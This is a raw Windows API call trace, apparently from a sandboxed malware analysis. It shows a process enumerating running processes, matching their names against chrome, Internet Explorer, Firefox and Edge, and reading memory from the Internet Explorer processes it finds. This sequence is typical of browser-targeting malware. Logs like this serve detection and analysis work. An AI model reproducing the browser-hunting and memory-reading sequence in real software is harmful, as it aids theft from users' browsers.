	[0233.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0233.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6f58
	[0233.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.027] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0233.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.028] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.028] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0233.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.029] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0233.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6f5c
	[0233.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.030] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0233.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.031] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.031] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0233.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.031] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.032] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0233.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6f60
	[0233.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.032] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0233.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.033] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.034] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0233.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.034] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0233.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6f64
	[0233.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.035] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0233.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.036] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.037] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0233.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.037] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0233.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6f68
	[0233.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.038] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0233.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.039] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.039] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0233.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.039] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0233.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6f6c
	[0233.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.040] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0233.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.040] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.041] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0233.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.041] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0233.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6f70
	[0233.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.042] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0233.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.043] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.043] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0233.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.044] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.044] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0233.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6f74
	[0233.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.045] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0233.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.045] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.046] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0233.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.047] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0233.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6f78
	[0233.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.048] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0233.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.049] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.050] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0233.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.050] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0233.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6f7c
	[0233.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.051] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0233.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.052] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.053] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0233.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.053] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0233.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6f80
	[0233.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.055] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0233.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.055] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.056] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0233.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.056] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.057] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6f84
	[0233.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.058] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.058] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.058] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.059] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.059] NtQueryInformationProcess (in: ProcessHandle=0x6f84, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.059] ReadProcessMemory (in: hProcess=0x6f84, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.059] ReadProcessMemory (in: hProcess=0x6f84, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.059] ReadProcessMemory (in: hProcess=0x6f84, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.059] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.060] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6f88
	[0233.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.060] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.061] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.061] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.061] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.062] NtQueryInformationProcess (in: ProcessHandle=0x6f88, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.062] ReadProcessMemory (in: hProcess=0x6f88, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.062] ReadProcessMemory (in: hProcess=0x6f88, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.062] ReadProcessMemory (in: hProcess=0x6f88, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.062] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.062] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6f8c
	[0233.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.063] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.063] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.064] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.064] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.064] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0233.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6f90
	[0233.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.066] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0233.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.066] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.066] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0233.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.067] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6f94
	[0233.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.068] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.068] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.069] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.069] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.070] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6f98
	[0233.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.072] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.073] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.073] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.074] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.074] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6f9c
	[0233.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.075] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.075] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.076] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.076] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.076] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6fa0
	[0233.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.077] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.077] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.078] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.078] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0233.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6fa4
	[0233.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.079] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.080] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.080] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.081] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6fa8
	[0233.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.082] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.082] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.082] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.083] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.083] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6fac
	[0233.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.084] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.084] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.085] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.085] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.085] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0233.086] CloseHandle (hObject=0x4fd0) returned 1
	[0233.086] Sleep (dwMilliseconds=0x64) 
	[0233.195] GetCurrentProcessId () returned 0x110
